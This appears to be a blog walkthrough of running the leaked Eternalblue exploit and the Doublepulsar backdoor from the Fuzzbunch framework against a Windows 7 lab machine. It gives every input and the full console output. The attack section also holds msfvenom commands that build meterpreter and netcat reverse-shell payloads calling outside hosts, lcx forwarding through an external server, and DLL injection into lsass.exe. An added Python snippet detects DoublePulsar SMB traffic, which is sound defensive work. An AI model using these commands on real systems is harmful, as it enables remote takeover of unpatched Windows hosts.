
Hands-on test of the NSA Equation Group tools (Eternalblue)

April 15, 2017

1. Environment

Target: Win7, IP: 192.168.208.128

Attacker: Win2003, IP: 192.168.208.164

The attacking machine needs a Python 2.6 environment with pywin32 installed:

python-2.6.6.msi

https://www.python.org/download/releases/2.6.6/

pywin32-221.win-amd64-py2.6.exe

https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/

2. Attack process

After downloading the Equation Group tools, create a listeningposts directory in the current directory; only then does the program run normally. Every place where input is required is highlighted below (the annotations after //); anywhere else, just press Enter to accept the default.

C:\Python26>python "C:\Documents and Settings\Administrator\桌面\windows\fb.py"

--[ Version 3.5.1

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON

ImplantConfig Autorun List
==========================

0) prompt confirm
1) execute
Exploit Autorun List
====================

0) apply
1) touch all
2) prompt confirm
3) execute
Special Autorun List
====================

0) apply
1) touch all
2) prompt confirm
3) execute
Payload Autorun List
====================

0) apply
1) prompt confirm
2) execute
[+] Set FbStorage => C:\Documents and Settings\Administrator\桌面\windows\storage

[*] Retargetting Session

[?] Default Target IP Address [] : 192.168.208.128   // target IP
[?] Default Callback IP Address [] : 192.168.208.164 // callback IP
[?] Use Redirection [yes] : no

[?] Base Log directory [D:\logs] : c:\d
[*] Checking c:\d for projects
Index Project
----- -------
0 Create a New Project

[?] Project [0] : 0 // create a new project
[?] New Project Name : test // project name
[?] Set target log directory to 'c:\d\test\z192.168.208.128'? [Yes] :

[*] Initializing Global State
[+] Set TargetIp => 192.168.208.128
[+] Set CallbackIp => 192.168.208.124

[!] Redirection OFF
[+] Set LogDir => c:\d\test\z192.168.208.128
[+] Set Project => test

fb >

Once loaded, start testing with the modules NSA provided; Eternalblue is used as the example here.

fb > use Eternalblue // invoke the Eternalblue module

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.208.128

[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Enter Prompt Mode :: Eternalblue

Module: Eternalblue
===================

Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.208.128
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
Target WIN72K8R2

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*] TargetIp :: Target IP Address

[?] TargetIp [192.168.208.128] :

[*] TargetPort :: Port used by the SMB service for exploit connection

[?] TargetPort [445] :

[*] VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.

[?] VerifyTarget [True] :

[*] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.

[?] VerifyBackdoor [True] :

[*] MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.

[?] MaxExploitAttempts [3] :

[*] GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.

[?] GroomAllocations [12] :

[*] Target :: Operating System, Service Pack, and Architecture of target OS

0) XP Windows XP 32-Bit All Service Packs
*1) WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] : 0 // choose XP or Win7/2K8 according to the actual target
[+] Set Target => XP
[!] Preparing to Execute Eternalblue

[*] Mode :: Delivery mechanism

*0) DANE Forward deployment via DARINGNEOPHYTE
1) FB Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1 // delivery mode
[+] Run Mode: FB

[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure?
(y/n) [Yes] :
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.208.128] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.208.128:445

[+] Configure Plugin Remote Tunnels
Module: Eternalblue
===================

Name Value
---- -----
DaveProxyPort 0
NetworkTimeout 60
TargetIp 192.168.208.128
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target XP

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit)
[+] Backdoor is already installed -- nothing to be done.
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 01 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

fb Special (Eternalblue) >

[+] Eternalblue Succeeded: the backdoor has now been implanted. Next, use Doublepulsar to connect to it.

fb Special (Eternalblue) > use Doublepulsar // invoke the module

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.208.128

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.208.128
TargetPort 445
OutputFile
Protocol SMB
Architecture x86
Function OutputInstall

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*] TargetIp :: Target IP Address

[?] TargetIp [192.168.208.128] :

[*] TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*] Protocol :: Protocol for the backdoor to speak

*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] : 0 // choose how to connect to the backdoor

[*] Architecture :: Architecture of the target OS

*0) x86 x86 32-bits
1) x64 x64 64-bits

[?] Architecture [0] : 0 // choose the target's architecture

[*] Function :: Operation for backdoor to perform

*0) OutputInstall Only output the install shellcode to a binary file on disk.
1) Ping Test for presence of backdoor
2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove's backdoor from system

[?] Function [0] :

There are four options here: the first tests (pings) the backdoor, the second executes our DLL. I chose 2 here, using a payload generated with msf:

root@am0s:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.208.129 LPORT=5555 -f dll >ss.dll  // generate the reverse shell


[?] Function [0] : 2 // run the self-built DLL
[+] Set Function => RunDLL

[*] DllPayload :: DLL to inject into user mode

[?] DllPayload [] : c:\ss.dll // path to the DLL
[+] Set DllPayload => c:\ss.dll

[*] DllOrdinal :: The exported ordinal number of the DLL being injected to call
[?] DllOrdinal [1] :

[*] ProcessName :: Name of process to inject into

[?] ProcessName [lsass.exe] :

[*] ProcessCommandLine :: Command line of process to inject into

[?] ProcessCommandLine [] :
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.208.128] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.208.128:445

[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================

Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.208.128
TargetPort 445
DllPayload c:\ss.dll
DllOrdinal 1
ProcessName lsass.exe
ProcessCommandLine
Protocol SMB
Architecture x86
Function RunDLL

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0xD977D3CE
SMB Connection string is: Windows 7 Ultimate 7601 Service Pack 1
Target OS is: 7 x64
Target SP is: 1
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Command completed successfully
[+] Doublepulsar Succeeded

fb Payload (Doublepulsar) >

[+] Doublepulsar Succeeded: you can see it executed successfully, and my msf also received a meterpreter session. At this point the penetration is complete.
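From the defender's side, the "Pinging backdoor" / "Backdoor returned code: 10" exchange above has a network fingerprint: DoublePulsar is driven over the reserved Trans2 SESSION_SETUP subcommand, and an implanted host answers with multiplex ID 0x51 where a clean server would simply echo the request's ID. The following check is an added example, not code from the original post or from the Fuzzbunch tooling; the SMB frames it inspects are constructed inline, and the helper names are my own.

```python
import struct

# SMBv1 header constants (constructed example, not from the original post)
SMB_COM_TRANSACTION2 = 0x32
SMB_FLAGS_REPLY = 0x80
TRANS2_SESSION_SETUP = 0x000E   # reserved Trans2 subcommand that DoublePulsar uses as its "ping"
DOUBLEPULSAR_REPLY_MID = 0x51   # the implanted backdoor answers with MultiplexID 0x51 (81)

def parse_smb1(frame):
    """Parse a NetBIOS-framed SMBv1 message into the fields the check needs, or None."""
    if len(frame) < 36 or frame[4:8] != b"\xffSMB":
        return None
    body = frame[4:]                              # drop the 4-byte NetBIOS session header
    command, flags = body[4], body[9]
    mid = struct.unpack_from("<H", body, 30)[0]   # MultiplexID is the last header field
    subcmd = None
    if command == SMB_COM_TRANSACTION2 and not flags & SMB_FLAGS_REPLY and len(body) >= 63:
        # request: WordCount(1) + 14 fixed words (28 bytes) precede Setup[0], the subcommand
        subcmd = struct.unpack_from("<H", body, 61)[0]
    return {"command": command, "reply": bool(flags & SMB_FLAGS_REPLY), "mid": mid, "subcmd": subcmd}

def classify(frame):
    """Return 'doublepulsar-ping', 'doublepulsar-reply' or 'benign' for one frame."""
    h = parse_smb1(frame)
    if h is None or h["command"] != SMB_COM_TRANSACTION2:
        return "benign"
    if not h["reply"] and h["subcmd"] == TRANS2_SESSION_SETUP:
        return "doublepulsar-ping"                # no normal client sends this subcommand
    if h["reply"] and h["mid"] == DOUBLEPULSAR_REPLY_MID:
        return "doublepulsar-reply"               # a clean server echoes the request's MID
    return "benign"

def build_frame(command, flags, mid, payload=b""):
    """Construct a minimal NetBIOS+SMBv1 frame for the samples below (constructed, not captured)."""
    hdr = b"\xffSMB" + bytes([command]) + b"\x00" * 4 + bytes([flags]) + b"\x00" * 20
    body = hdr + struct.pack("<H", mid) + payload
    return b"\x00" + len(body).to_bytes(3, "big") + body

def trans2_request(mid, subcmd):
    # WordCount 15 = 14 fixed words (zeroed here) + 1 setup word, then Setup[0] and ByteCount
    words = b"\x0f" + b"\x00" * 28 + struct.pack("<H", subcmd) + b"\x00\x00"
    return build_frame(SMB_COM_TRANSACTION2, 0x00, mid, words)

SAMPLES = {   # constructed sample traffic: two benign exchanges and one backdoor ping/reply
    "negotiate":      build_frame(0x72, 0x00, 0x0001),
    "find_first2":    trans2_request(0x0002, 0x0001),
    "normal_reply":   build_frame(SMB_COM_TRANSACTION2, SMB_FLAGS_REPLY, 0x0002, b"\x0a" + b"\x00" * 20),
    "backdoor_ping":  trans2_request(0x0041, TRANS2_SESSION_SETUP),
    "backdoor_reply": build_frame(SMB_COM_TRANSACTION2, SMB_FLAGS_REPLY, DOUBLEPULSAR_REPLY_MID, b"\x0a" + b"\x00" * 20),
}

def scan(frames):
    """Return the names of frames that carry a DoublePulsar indicator."""
    return [name for name, f in frames.items() if classify(f) != "benign"]
```

Feeding the same function frames carved from a port 445 capture gives one verdict per message; the subcommand and multiplex-ID checks are the same indicators the public DoublePulsar detection rules key on.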

3. Supplement

The msf instance in the VM sits on an internal network; to connect it to the attacking machine's internal network, an external server is needed to forward the connection.

root@am0s:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=3333 -f exe >/root/Desktop/ss.exe

Then, on the external server, use lcx to receive and forward:

lcx -listen 3333 5555

Then run the exploit handler in msf:

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp

msf exploit(handler) > set LPORT 5555

msf exploit(handler) > set RHOST x.x.x.x

msf exploit(handler) > exploit

The forwarding then succeeds, giving msf connectivity from one internal network to the other.

Reverse shell via nc:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=x.x.x.x LPORT=8888 -f dll > shell.dll
